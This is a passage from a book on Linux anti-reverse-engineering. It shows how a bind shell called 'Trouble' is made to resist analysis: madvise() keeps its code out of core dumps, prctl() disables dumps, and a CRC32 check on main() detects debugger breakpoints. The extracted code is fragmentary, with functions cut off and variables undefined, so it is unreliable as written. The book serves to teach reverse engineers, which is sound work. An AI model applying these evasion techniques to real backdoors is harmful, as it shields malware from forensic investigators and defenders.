Reading symbols from /home/albino-lobster/antire_book/chap_6_debugger/dontpanic/build\
/trouble/trouble...(no debugging symbols found)...done.
0x0000000000402264 in __syscall ()
(gdb) c
Continuing.
[Inferior 1 (process 11034) exited with code 01]
(gdb) quit
albino-lobster@ubuntu:~$ ps fa
PID TTY STAT TIME COMMAND
6352 pts/21 Ss 0:00 bash
11062 pts/21 R+ 0:00 \_ ps fa
6230 pts/9 Ss+ 0:00 bash
albino-lobster@ubuntu:~$
Chapter 6: Evading the Debugger 220
madvise
In the previous section, you introduced a new way to detect if a debugger is attached
to Troubles tracing child. However, the method doesnt protect against utilities that
attach and detach without controlling executing like gcore.
albino-lobster@ubuntu:~$ ps fa
PID TTY STAT TIME COMMAND
6369 pts/29 Ss+ 0:00 bash
6352 pts/21 Ss 0:00 bash
16614 pts/21 R+ 0:00 \_ ps fa
6230 pts/9 Ss 0:00 bash
16611 pts/9 S+ 0:00 \_ sudo ./trouble/trouble
16612 pts/9 S+ 0:00 \_ ./trouble/trouble
16613 pts/9 S+ 0:00 \_ ./trouble/trouble
albino-lobster@ubuntu:~$ sudo gcore 16613
0x0000000000402374 in __syscall ()
Saved corefile core.16613
As mentioned previously, a core file can be loaded into IDA and provides a view of
Trouble that strips away many of the obfuscations techniques. However, there is a
Linux function called madvise() that will allow us to exclude memory ranges from
being included in a core file. From the man page:
The madvise() system call is used to give advice or directions to the kernel
about the address range beginning at address addr and with size length
bytes. Initially, the system call sup ported a set of conventional advice
values, which are also available on several other implementations. (Note,
though, that madvise() is not specified in POSIX.) Subsequently, a number
of Linux-specific advice values have been added.
Using madvise(), you can prevent gcore from dumping Trouble after the cryptor has
been executed. The only real challenge is how to programmatically find the addresses
to pass to madvise(). To do this I created another post-compilation tool. You can find
this tool in the chapter 6 dontpanic directory under madvise. The project, as usual,
contains two files.
chap_6_debugger/dontpanic/madvise/CMakeLists.txt
project(madvise CXX)
cmake_minimum_required(VERSION 3.0)
add_executable(${PROJECT_NAME} src/madvise.cpp)
chap_6_debugger/dontpanic/madvise/src/madvise.cpp
#include <cstdlib>
#include <iostream>
#include <fstream>
#include <iomanip>
#include <cstring>
#include <elf.h>
/*
* Parse the program headers and store the address/size of the first LOAD. Then walk
* the section headers table looking for ".madvise_base_addr" and ".madvise_size"
* where we'll store the address and size we pulled from the LOAD segment.
*
* \param[in,out] p_data the ELF binary
* \return true if we found both .madvise sections
*/
bool add_advise_info(std::string& p_data)
Chapter 6: Evading the Debugger 222
{
if (p_data[0] != 0x7f || p_data[1] != 'E' || p_data[2] != 'L' || p_data[3] != 'F')
{
return false;
}
int found = 0;
Elf64_Shdr* current = sections;
for (int i = 0; i < sections_count; i++, current++)
{
std::string section_name(&strings_table[current->sh_name]);
if (section_name.find(".madvise_base_addr") == 0)
{
memcpy(&p_data[0] + current->sh_offset, &base_address,
sizeof(base_address));
found++;
}
else if (section_name.find(".madvise_size") == 0)
{
memcpy(&p_data[0] + current->sh_offset, &size, sizeof(size));
found++;
}
}
std::string input((std::istreambuf_iterator<char>(inputFile)),
std::istreambuf_iterator<char>());
inputFile.close();
if(!add_advise_info(input))
{
return EXIT_FAILURE;
}
outputFile.write(input.data(), input.length());
outputFile.close();
return EXIT_SUCCESS;
}
This tool will look for two names in the section table: .madvise_base_addr and
.madvise_size. The tool will copy the address and size found in the first program
header into those section.
Chapter 6: Evading the Debugger 224
Next you need to update Trouble to use the madvise tool. The first step is to hook
madvise into Troubles CMakeList.txt.
chap_6_debugger/dontpanic/trouble/CMakeList.txt
project(trouble C)
cmake_minimum_required(VERSION 3.0)
# This will create a 32 byte "password" for the bind shell. This command
# is only run when "cmake" is run, so if you want to generate a new password
# then "cmake ..; make" should be run from the command line.
exec_program("/bin/sh"
${CMAKE_CURRENT_SOURCE_DIR}
ARGS "-c 'cat /dev/urandom | tr -dc a-zA-Z0-9 | head -c 32'"
OUTPUT_VARIABLE random_password )
set(CMAKE_C_COMPILER musl-gcc)
set(CMAKE_C_FLAGS "-Wall -Wextra -Wshadow -static -std=gnu11 -Wno-int-to-pointer-cas\
t")
add_executable(${PROJECT_NAME} src/trouble.c src/rc4.c)
add_custom_target(addLDS
COMMAND sed -i -e 's,-o,${CMAKE_CURRENT_SOURCE_DIR}/trouble_layout.lds -o,g' ./CM\
akeFiles/trouble.dir/link.txt)
add_dependencies(${PROJECT_NAME} addLDS)
# After the build is successful, display the random password to the user
add_custom_command(TARGET ${PROJECT_NAME} POST_BUILD
COMMAND ${CMAKE_COMMAND} -E echo
"The bind shell password is:" ${random_password})
add_custom_command(TARGET ${PROJECT_NAME}
POST_BUILD
COMMAND ../madvise/madvise ${CMAKE_CURRENT_BINARY_DIR}/${PROJECT_NAME})
add_custom_command(TARGET ${PROJECT_NAME}
POST_BUILD
COMMAND ../encryptFunctions/encryptFunctions ${CMAKE_CURRENT_BINARY_DIR}/${PROJEC\
T_NAME})
Chapter 6: Evading the Debugger 225
add_custom_command(TARGET ${PROJECT_NAME}
POST_BUILD
COMMAND ../cryptor/cryptor ${CMAKE_CURRENT_BINARY_DIR}/${PROJECT_NAME})
Also, the special sections need to be created in Trouble. As youve done in previous
chapters, you can create special sections by using the section attribute.
Now if you recompile Trouble you should see madvise as part of the build process.
albino-lobster@ubuntu:~/antire_book/chap_6_debugger/dontpanic/build$ make
Scanning dependencies of target stripBinary
[ 7%] Building CXX object stripBinary/CMakeFiles/stripBinary.dir/src/stripBinary.cpp\
.o
[ 14%] Linking CXX executable stripBinary
[ 14%] Built target stripBinary
Scanning dependencies of target fakeHeadersXBit
[ 21%] Building CXX object fakeHeadersXBit/CMakeFiles/fakeHeadersXBit.dir/src/fakeHea\
dersXBit.cpp.o
[ 28%] Linking CXX executable fakeHeadersXBit
Chapter 6: Evading the Debugger 226
Now if you create a core file using gcore the output looks the same.
However, if you look at the cores program headers in readelf, youll notice that the
0x400000 range that Trouble executes out of is missing.
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
NOTE 0x0000000000000190 0x0000000000000000 0x0000000000000000
0x00000000000009d0 0x0000000000000000 R 1
LOAD 0x0000000000000b60 0x0000000000604000 0x0000000000000000
0x0000000000002000 0x0000000000002000 RW 1
LOAD 0x0000000000002b60 0x00000000007b0000 0x0000000000000000
0x0000000000001000 0x0000000000001000 RW 1
LOAD 0x0000000000003b60 0x00007ffef2576000 0x0000000000000000
0x0000000000021000 0x0000000000021000 RW 1
LOAD 0x0000000000024b60 0x00007ffef25cc000 0x0000000000000000
0x0000000000002000 0x0000000000002000 R E 1
LOAD 0x0000000000026b60 0xffffffffff600000 0x0000000000000000
0x0000000000001000 0x0000000000001000 R E 1
Furthermore, if you drop the core into IDA, youll see that the 0x400000 range truly
doesnt exist in the core. This effectively hides all of Troubles code.
Chapter 6: Evading the Debugger 228
prctl
In the previous section, you prevented the deobfuscated code from appearing in a
core dump. However, maybe it would be better to not allow a core to be dumped at
all? Ive been using gcore to generate the core file so far. However, that isnt necessary.
A core can be generated simply by sending the correct signal a Trouble.
Chapter 6: Evading the Debugger 229
albino-lobster@ubuntu:~/antire_book/chap_6_debugger/dontpanic/build$ ls -l
total 56
-rw-rw-r-- 1 albino-lobster albino-lobster 13260 Dec 5 05:54 CMakeCache.txt
drwxrwxr-x 4 albino-lobster albino-lobster 4096 Dec 5 17:30 CMakeFiles
-rw-rw-r-- 1 albino-lobster albino-lobster 2187 Dec 5 05:54 cmake_install.cmake
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 cryptor
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 encryptFunctions
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 fakeHeadersXBit
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 madvise
-rw-rw-r-- 1 albino-lobster albino-lobster 7041 Dec 5 05:54 Makefile
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 stripBinary
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 17:30 trouble
albino-lobster@ubuntu:~/antire_book/chap_6_debugger/dontpanic/build$ sudo ./trouble/t\
rouble &
[1] 7773
albino-lobster@ubuntu:~/antire_book/chap_6_debugger/dontpanic/build$ ulimit -c unlimi\
ted
albino-lobster@ubuntu:~/antire_book/chap_6_debugger/dontpanic/build$ ps fa
PID TTY STAT TIME COMMAND
2135 pts/11 Ss 0:00 bash
7773 pts/11 S 0:00 \_ sudo ./trouble/trouble
7774 pts/11 S 0:00 | \_ ./trouble/trouble
7775 pts/11 S 0:00 | \_ ./trouble/trouble
7776 pts/11 R+ 0:00 \_ ps fa
albino-lobster@ubuntu:~/antire_book/chap_6_debugger/dontpanic/build$ sudo kill -11 77\
75
albino-lobster@ubuntu:~/antire_book/chap_6_debugger/dontpanic/build$ ls -l
total 228
-rw-rw-r-- 1 albino-lobster albino-lobster 13260 Dec 5 05:54 CMakeCache.txt
drwxrwxr-x 4 albino-lobster albino-lobster 4096 Dec 5 17:30 CMakeFiles
-rw-rw-r-- 1 albino-lobster albino-lobster 2187 Dec 5 05:54 cmake_install.cmake
-rw------- 1 root root 176128 Dec 5 17:32 core
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 cryptor
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 encryptFunctions
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 fakeHeadersXBit
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 madvise
-rw-rw-r-- 1 albino-lobster albino-lobster 7041 Dec 5 05:54 Makefile
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 stripBinary
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 17:30 trouble
[1]+ Killed sudo ./trouble/trouble
albino-lobster@ubuntu:~/antire_book/chap_6_debugger/dontpanic/build$ sudo readelf -l \
Chapter 6: Evading the Debugger 230
./core
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
NOTE 0x0000000000000200 0x0000000000000000 0x0000000000000000
0x0000000000000a38 0x0000000000000000 0
LOAD 0x0000000000001000 0x0000000000400000 0x0000000000000000
0x0000000000000000 0x0000000000005000 RWE 1000
LOAD 0x0000000000001000 0x0000000000604000 0x0000000000000000
0x0000000000002000 0x0000000000002000 RW 1000
LOAD 0x0000000000003000 0x0000000002212000 0x0000000000000000
0x0000000000001000 0x0000000000001000 RW 1000
LOAD 0x0000000000004000 0x00007fff0efc8000 0x0000000000000000
0x0000000000022000 0x0000000000022000 RW 1000
LOAD 0x0000000000026000 0x00007fff0eff1000 0x0000000000000000
0x0000000000002000 0x0000000000002000 R 1000
LOAD 0x0000000000028000 0x00007fff0eff3000 0x0000000000000000
0x0000000000002000 0x0000000000002000 R E 1000
LOAD 0x000000000002a000 0xffffffffff600000 0x0000000000000000
0x0000000000001000 0x0000000000001000 R E 1000
Not only did this generate a core, but the 0x400000 range is clearly visible! We cant
allow this. Fortunately for us, Linux provides a function that you can use to prevent
signals triggering core file generation. That function is prctl() used with the PR_-
SET_DUMPABLE option. From the man page:
PR_SET_DUMPABLE
Set the state of the dumpable flag, which determines whether core
dumps are produced for the calling process upon delivery of a signal whose
default behavior is to produce a core dump.
Now if the reverse engineer tries to generate a core than nothing will happen.
albino-lobster@ubuntu:~/antire_book/chap_6_debugger/dontpanic/build$ ls -l
total 56
-rw-rw-r-- 1 albino-lobster albino-lobster 13260 Dec 5 05:54 CMakeCache.txt
drwxrwxr-x 4 albino-lobster albino-lobster 4096 Dec 5 17:51 CMakeFiles
-rw-rw-r-- 1 albino-lobster albino-lobster 2187 Dec 5 05:54 cmake_install.cmake
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 cryptor
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 encryptFunctions
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 fakeHeadersXBit
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 madvise
-rw-rw-r-- 1 albino-lobster albino-lobster 7041 Dec 5 05:54 Makefile
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 stripBinary
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 17:51 trouble
albino-lobster@ubuntu:~/antire_book/chap_6_debugger/dontpanic/build$ sudo ./trouble/t\
rouble &
[1] 8077
albino-lobster@ubuntu:~/antire_book/chap_6_debugger/dontpanic/build$ ps fa
PID TTY STAT TIME COMMAND
2135 pts/11 Ss 0:00 bash
8077 pts/11 S 0:00 \_ sudo ./trouble/trouble
8078 pts/11 S 0:00 | \_ ./trouble/trouble
8079 pts/11 S 0:00 | \_ ./trouble/trouble
8080 pts/11 R+ 0:00 \_ ps fa
albino-lobster@ubuntu:~/antire_book/chap_6_debugger/dontpanic/build$ sudo kill -11 80\
Chapter 6: Evading the Debugger 232
79
[1]+ Killed sudo ./trouble/trouble
albino-lobster@ubuntu:~/antire_book/chap_6_debugger/dontpanic/build$ ls -l
total 56
-rw-rw-r-- 1 albino-lobster albino-lobster 13260 Dec 5 05:54 CMakeCache.txt
drwxrwxr-x 4 albino-lobster albino-lobster 4096 Dec 5 17:51 CMakeFiles
-rw-rw-r-- 1 albino-lobster albino-lobster 2187 Dec 5 05:54 cmake_install.cmake
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 cryptor
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 encryptFunctions
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 fakeHeadersXBit
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 madvise
-rw-rw-r-- 1 albino-lobster albino-lobster 7041 Dec 5 05:54 Makefile
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 05:54 stripBinary
drwxrwxr-x 3 albino-lobster albino-lobster 4096 Dec 5 17:51 trouble
/**
* Before we enter main check to see if a debugger is present
*/
void __attribute__((constructor)) before_main()
{
check_proc_status();
}
/**
* This implements a fairly simple bind shell. The server first requires a
Sometimes GDB will crash in main() upon entry. That is because GDB inserts a break point at the first instruction in
main(), but the cryptor computes an XOR over that value. This can sometimes cause a crash and sometimes not (depends on
the generated code).
Chapter 6: Evading the Debugger 233
While I think the encryption approach is the better choice because it has a few other
benefits (anti static analysis and anti memory analysis) variety is the spice of life.
For this implementation youll be using a modified version of the CRC32 algorithm
written by Stephan Brumme. The CRC32 code is spread across two files:
chap_6_debugger/dontpanic/computeChecksums/src/crc32.h
#include <stdint.h>
// based on http://create.stephan-brumme.com/crc32/#git1
uint32_t crc32_bitwise(const unsigned char* data, uint64_t length);
chap_6_debugger/dontpanic/computeChecksums/src/crc32.c
#include "crc32.h"
#include <stdlib.h>
#include <sys/param.h>
while (length-- != 0)
{
crc ^= *current++;
return ~crc;
}
http://create.stephan-brumme.com/crc32/
Chapter 6: Evading the Debugger 235
As youve done previously, youll rely on special section names and the linker to
find the code we want to compute the checksum over and insert the proper values
post-compilation. Ive introduced a new project called computeChecksums in the
chapter 6 repository. The computeChecksums directory contains the crc files above
and two other files:
chap_6_debugger/dontpanic/computeChecksums/CMakeLists.txt
project(computeChecksums CXX)
cmake_minimum_required(VERSION 3.0)
add_executable(${PROJECT_NAME}
src/computeChecksums.cpp
src/crc32.c)
chap_6_debugger/dontpanic/computeChecksums/src/computeChecksums.cpp
#include <cstdlib>
#include <iostream>
#include <fstream>
#include <iomanip>
#include <cstring>
#include <elf.h>
#include <map>
#include "crc32.h"
return true;
}
/*
* Load ELF.
* Scan sections for "load_crc_xxx"
* Scan sections for "xxx"
*/
int main(int p_argc, char** p_argv)
{
if (p_argc != 2)
{
Chapter 6: Evading the Debugger 237
std::string input((std::istreambuf_iterator<char>(inputFile)),
std::istreambuf_iterator<char>());
inputFile.close();
compute_crcs(input);
outputFile.write(input.data(), input.length());
outputFile.close();
return EXIT_SUCCESS;
}
chap_6_debugger/dontpanic/CMakeLists.txt
project(dontpanic C)
cmake_minimum_required(VERSION 3.0)
add_subdirectory(stripBinary)
add_subdirectory(fakeHeadersXBit)
add_subdirectory(encryptFunctions)
add_subdirectory(computeChecksums)
add_subdirectory(madvise)
add_subdirectory(cryptor)
add_subdirectory(trouble)
chap_6_debugger/dontpanic/trouble_layout.lds
SECTIONS
{
check_password_size = SIZEOF(.check_password);
main_function_size = SIZEOF(.main_function);
}
chap_6_debugger/dontpanic/trouble/src/trouble.c
Lets change before_main() to compare the stored crc32 of main() against the value
computed at runtime.
Chapter 6: Evading the Debugger 239
/**
* Before we enter main check to see if a debugger is present
*/
void __attribute__((constructor)) before_main()
{
// check for bp in launch_thread
if(crc32_bitwise((unsigned char*)(&main), (uint64_t)&main_function_size) !=
main_function_crc)
{
exit(0);
}
}
chap_6_debugger/dontpanic/CMakeLists.txt
project(trouble C)
cmake_minimum_required(VERSION 3.0)
# This will create a 32 byte "password" for the bind shell. This command
# is only run when "cmake" is run, so if you want to generate a new password
# then "cmake ..; make" should be run from the command line.
exec_program("/bin/sh"
${CMAKE_CURRENT_SOURCE_DIR}
ARGS "-c 'cat /dev/urandom | tr -dc a-zA-Z0-9 | head -c 32'"
OUTPUT_VARIABLE random_password )
set(CMAKE_C_COMPILER musl-gcc)
set(CMAKE_C_FLAGS "-Wall -Wextra -Wshadow -static -std=gnu11 -Wno-int-to-pointer-cas\
t")
add_executable(${PROJECT_NAME} src/trouble.c src/rc4.c src/crc32.c)
add_custom_target(addLDS
COMMAND sed -i -e 's,-o,${CMAKE_CURRENT_SOURCE_DIR}/trouble_layout.lds -o,g' ./CM\
akeFiles/trouble.dir/link.txt)
Chapter 6: Evading the Debugger 240
add_dependencies(${PROJECT_NAME} addLDS)
# After the build is successful, display the random password to the user
add_custom_command(TARGET ${PROJECT_NAME} POST_BUILD
COMMAND ${CMAKE_COMMAND} -E echo
"The bind shell password is:" ${random_password})
add_custom_command(TARGET ${PROJECT_NAME}
POST_BUILD
COMMAND ../madvise/madvise ${CMAKE_CURRENT_BINARY_DIR}/${PROJECT_NAME})
add_custom_command(TARGET ${PROJECT_NAME}
POST_BUILD
COMMAND ../computeChecksums/computeChecksums ${CMAKE_CURRENT_BINARY_DIR}/${PROJEC\
T_NAME})
add_custom_command(TARGET ${PROJECT_NAME}
POST_BUILD
COMMAND ../encryptFunctions/encryptFunctions ${CMAKE_CURRENT_BINARY_DIR}/${PROJEC\
T_NAME})
add_custom_command(TARGET ${PROJECT_NAME}
POST_BUILD
COMMAND ../cryptor/cryptor ${CMAKE_CURRENT_BINARY_DIR}/${PROJECT_NAME})
albino-lobster@ubuntu:~/antire_book/chap_6_debugger/dontpanic/build$ make
[ 11%] Built target stripBinary
[ 22%] Built target fakeHeadersXBit
[ 38%] Built target encryptFunctions
Scanning dependencies of target computeChecksums
[ 44%] Building CXX object computeChecksums/CMakeFiles/computeChecksums.dir/src/compu\
teChecksums.cpp.o
[ 50%] Linking CXX executable computeChecksums
[ 55%] Built target computeChecksums
[ 66%] Built target madvise
[ 77%] Built target cryptor
[ 77%] Built target addLDS
Scanning dependencies of target trouble
Chapter 6: Evading the Debugger 241
Now when you execute Trouble using GDB the output should look like this.
Trouble exits because GDB has modified main() by overwriting a byte with a
breakpoint. When Trouble computes the checksum over main() it wont match the
stored checksum which causes Trouble to exit.
Conclusion: All That We Fall For
This concludes the book. For your pleasure Ive created a final version of the
Trouble bind shell in its own GitHub repository. The goal of this version is to combine
as many of the anti-reversing techniques that you learned into a single binary.
Remember, Trouble is not immune to reversing. It is simply meant to be annoying to
reverse. You can find the final version here:
https://github.com/antire-book/dont_panic
Thanks for following along. Happy reversing!